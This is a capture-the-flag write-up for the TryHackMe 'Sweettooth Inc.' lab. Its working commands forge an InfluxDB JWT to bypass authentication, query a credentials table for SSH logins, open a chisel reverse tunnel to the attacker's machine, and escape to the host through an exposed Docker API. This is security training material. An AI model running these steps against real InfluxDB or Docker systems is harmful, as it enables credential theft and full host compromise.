Sweettooth Inc.
https://tryhackme.com/room/sweettoothinc
User Flag
Let's start with an nmap scan
Googling about InfluxDB we found something interesting in the following blog:
If we go to the /debug/requests path we can find an username for the database
Now we have to generate a JWT token (https://jwt.io/). The exp field is the token expiration date in epoch format.
Let's see if the token works:
curl -G http://10.10.62.99:8086/query --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "q=SHOW DATABASES"
It works.
No we have to extract the data we are asked
#List the tables on the tanks database
curl -G http://10.10.166.174:8086/query --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=tanks" --data-urlencode "q=SHOW MEASUREMENTS"
#Get data from the water_tank table
curl -G http://10.10.166.174:8086/query --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=tanks" --data-urlencode "q=SELECT * FROM water_tank"
#List the tables on the mixer database
curl -G http://10.10.166.174:8086/query --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=mixer" --data-urlencode "q=SHOW MEASUREMENTS"
#Get data from the mixer_stats table
curl -G http://10.10.166.174:8086/query --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=mixer" --data-urlencode "q=SELECT * FROM mixer_stats"#To get the max RPM we use this query
curl -G http://10.10.166.174:8086/query --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=mixer" --data-urlencode "q=SELECT max(motor_rpm) FROM mixer_stats"
#List the tables on the creds database
curl -G http://10.10.166.174:8086/query --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=creds" --data-urlencode "q=SHOW MEASUREMENTS"
#Get data from the ssh table
curl -G http://10.10.166.174:8086/query --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=creds" --data-urlencode "q=SELECT * from ssh"
Let's ssh into the machine using the creds we found and grab the flag.
Root Flag
Looking around the machine we found a script named "initializeandquery.sh" in the / folder. If we cat the file we see this output:
We can do a port forward and access that 8080 port from our machine.
Let's upload chisel in the victim machine.
Let's set up a chisel listener in our machine:
sudo chisel server --reverse --port 9001
In the victim machine:
./chisel client 10.11.36.103:9001 R:8003:127.0.0.1:8080
Now we can list the docker images
DOCKER_HOST=tcp://IP:8003 docker image ls
We can escape the docker
DOCKER_HOST=tcp://IP:8003 docker run -it -v /:/mnt --rm -it influxdb:1.3.0 chroot /mnt sh
Let's upgrade the shell and grab the flag
Root Flag (Docker)
For the docker root flag we listed the containers
And then executed the following command to get the root flag from the docker container
docker container exec -it sweettoothinc cat /root/root.txt
Last updated
Was this helpful?